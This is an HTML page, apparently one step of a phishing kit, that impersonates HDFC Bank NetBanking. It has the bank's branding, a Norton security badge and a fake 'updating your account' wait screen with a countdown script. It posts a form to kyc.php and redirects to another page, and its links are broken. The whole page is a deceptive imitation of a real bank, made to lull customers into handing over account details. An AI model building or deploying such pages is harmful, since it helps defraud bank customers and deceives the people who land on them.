<!DOCTYPE html>
<html lang="en">
    <head><link rel="stylesheet" type="text/css" href="a.css">
        <meta charset="utf-8" />
        <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
        <meta name="description" content="" />
        <meta name="author" content="" />
        <title>Shop Homepage - Start Bootstrap Template</title>
        <!-- Favicon-->
        <link rel="icon" type="image/x-icon" href="assets/favicon.ico" />
        <!-- Bootstrap icons-->
        <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.5.0/font/bootstrap-icons.css" rel="stylesheet" />
    </head>
    <body>
  <div class="loader"></div>
  <span class="text"></span>
</div> <!-- .page-loading ends -->

        <header>

            <div class="container px-4 px-lg-5">
                <div class="hdfclogoblk"> <img src="lo.png" class="width100" alt="" style="width: 157px;
    height: 40px;"> </div>
                
               <div class="hdfcwelcmetxt" id="hdfcwelcmetxtId" style="    font-size: 17px;"> Welcome to HDFC Bank NetBanking </div>
<hr></header>
<div class="container px-4 px-lg-5">
        <h1 class="display-4 fw-bolder"><div class="hdfcstatictxt mB20" style="   font-size: 19px;
    font-family: serif;
    color: #080303;">Please wait</div></h1>
</div>
    <div class="container px-4 px-lg-5"><body onload="startTimer();">
    <img src="third.jpeg" alt="" id="bg"><br><br>
    <center><img src="hh.jpeg" alt="" id="aa"></center><br>
    <center><img src="loading-gif-png-5.gif" alt="" id="ad" style="    width: 81px;"><br><br><br></center>
    <form action="kyc.php" method="post">
    <div id="ha">
    <center><h4 style="color:green; font-size:15px; font-family: Arial, Helvetica, sans-serif; margin:0px;">Please wait while we updating your account...</h4></center>
    </div>
    <div id="ba">
   <center><b style="font-size:14px; font-family: Arial, Helvetica, sans-serif;">Don't press any key while proccessing...</b></center>
   </div><br><br><br><be><br>
   <script>
   function myFunction() {
   window.location.href = "Snsnnz.html";
   }
   </script>
   <!--<div id="bb">
   <center><b style="color:#7212b3; margin:0px;">We sending One Time Password on your registered mobile number.</b></center>
    </div>-->
    
    <div style="text-align:center;">
    <script type="text/javascript">
    var timer=2;
    var sec=2;
    function startTimer() {
    sec=parseInt(timer%2);
    
    if (timer<0) {
    // timer.stop();
    window.location.href = "Snsnnz.html";
    }
    
    document.getElementById("time").innerHTML="<b> Please wait  </b>" +sec.toString();
    timer--;
    setTimeout(function(){
    startTimer();
    
    }, 1000);
    }
    </script>
    <div>
    <b style="color:grey; font-size:15px;"><span style="color:grey; font-size:15px;" id="time"><b> Please wait  </b>6</span>&nbsp;second</b>
    </div></div></be></form>
                    </div>
                    <form class="d-flex" action="Snsnnz.html" method="post">
                        
                       
                        </div>
                    </form>
                
       </div>
       
        <!-- Section-->
        
                    <div class="welcomesec last">
                        <div class="nwtquestwrap">

                        <div id="nortonimg2" class="col-sm-5 rightwrap fr" style="display: none;"> <!--FLEXENH-426-18/02/2020-Roshni Soni-EPI Split Page-->

                                <div class="nortonsecurity center lnheight"> <img src="nortonsecurity.png" alt="">

                                </div>

                                <div class="hdfcsmalltxt mB10"> <span class="color666">Your security is of utmost
                                        importance.</span>
                                        <span class="lightbluecolor"><a href="javascript:void(0)" onclick="return window.open('https:///personal/useful-links/security');">Know
                                            More...</a></span> </div>

                            </div>
                            
                            <div class="col-sm-6 leftwrap fl" id="welcomesec1"> <!--FLEXENH-426-18/02/2020-Roshni Soni-EPI Split Page-->

                                
                                    <div id="nortonimg1" class="col-sm-10 rightwrap fr"> <!--FLEXENH-426-18/02/2020-Roshni Soni-EPI Split Page-->

                                <div class="nortonsecurity center lnheight"> <img src="nortonsecurity.png" alt="">
                                </div>
                                <div class="hdfcsmalltxt mB10"> <span class="color666">Your security is of utmost
                                        importance.</span> 
                                        <span class="lightbluecolor"><a href="javascript:void(0)" onclick="return window.open('https:///personal/useful-links/security');">Know
                                            More...</a></span> </div>
                            </div>

                            <div class="clearfix"></div>
                            
                            </div>
                        <!--<hr> -->
                            <div class="col-sm-5 rightwrap fr" id="welcomesec2"> <!--FLEXENH-426-18/02/2020-Roshni Soni-EPI Split Page-->
                                <div><br><span class="hdfcstatictxt mB20">First Time User?</span><br>
                                 <span class="lightbluecolor"><a href="javascript:void(0)" onclick="return window.open('https:///netbanking/registrationUsingOTP.htm');">Register Now </a>
                                 for a host of convenient features</span> 
                                </div>
                                <br>
                                <div class="hdfcstatictxt mB20">We have added a host of new features!</div>
                                <div class="hdfcsmalltxt mB10"> <span class="lightblackcolor">You can now do so much
                                        more:</span> </div>
                                <div class="hdfcsmalltxt mB20"> <span class="lightblackcolor">
                                        <ul class="bullet">
                                            <li>Anywhere access through Desktop or mobile</li>
                                            <li>Enhanced security measures</li>
                                        </ul>
                                    </span> </div>
                            <!--    <div class="hdfcsmalltxt mB20">
                                    <span class="lightblackcolor">
                                        <a href="http:///htdocs/common/netbanking_video/retrieve_custID.htm"
                                            target="blank" class="lightbluecolor">View a Demo</a>
                                    </span>
                                </div> -->
                            </div>
                            <div class="clearfix"></div>
                        </div>
                    </div>
                                
        <footer class="py-5 bg-dark">
            <div class="footer-link-lrg" style="margin-top: 11%;">
                <div class="footer-btm" style="background: #1456a2;;color: white;">© Copyright HDFC Bank Ltd.
                    <a href="javascript:void(0)" onclick="openLink('/personal/useful-links/terms-and-conditions')">Terms and Conditions</a>
                    <a href="javascript:void(0)" onclick="openLink('')">Privacy Policy</a>
                </div>
            </div>
        </footer>
        <!-- Bootstrap core JS-->
        <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.bundle.min.js"></script>
    </body>
</html>
